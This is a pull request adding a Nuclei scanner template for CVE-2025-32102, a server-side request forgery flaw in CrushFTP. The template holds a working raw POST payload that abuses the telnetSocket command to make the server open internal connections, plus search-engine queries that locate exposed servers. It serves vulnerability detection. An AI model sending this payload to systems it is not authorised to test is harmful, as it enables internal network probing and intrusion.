### PR TITLE
Add CVE-2025-32102

### DIFF
--- a/http/cves/2025/CVE-2025-32102.yaml
+++ b/http/cves/2025/CVE-2025-32102.yaml
@@ -1,0 +1,49 @@
+id: CVE-2025-32102
+
+info:
+  name: CrushFTP - Server Side Request Forgery
+  author: Fur1na
+  severity: critical
+  description: |
+    CrushFTP is a server software that provides secure file transfer services. Affected versions include 9.x, 10.x to 10.8.4, and 11.x to 11.3.1, which have an SSRF (Server-Side Request Forgery) vulnerability. Unauthorized attackers can exploit this vulnerability to detect intranet information and even attack intranet hosts.
+  reference:
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32102
+    - https://seclists.org/fulldisclosure/2025/Apr/17
+  metadata:
+    max-request: 2
+    vendor: crushftp
+    product: crushftp
+    zoomeye-query: app="CrushFTP"
+    fofa-query: title="CrushFTP WebInterface"
+  tags: cve,cve2025,crushftp,ssrf
+
+http:
+  - raw:
+      - |
+        POST /WebInterface/function/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+
+        command=telnetSocket&sub_command=connect&host=127.0.0.1&port=8080&random=0.17159638175272862&c2f=CaVq
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<commandResult>"
+          - "</response>"
+        condition: and
+
+      - type: status
+        part: header
+        status:
+          - 200
+      
+      - type: word
+        part: body
+        words:
+          - "Connected"
+          - "ERROR:java.net.ConnectException"
+        condition: or

--- a/http/cves/2025/CVE-2025-32102.yaml
+++ b/http/cves/2025/CVE-2025-32102.yaml
@@ -40,7 +40,7 @@ http:
         part: header
         status:
           - 200
-      
+
       - type: word
         part: body
         words:


### PR DESCRIPTION
### Template / PR Information

Added CrushFTP - Server Side Request Forgery ( CVE-2025-32102 ) based on Nmap
- References:
  - https://seclists.org/fulldisclosure/2025/Apr/17
  - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32102

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)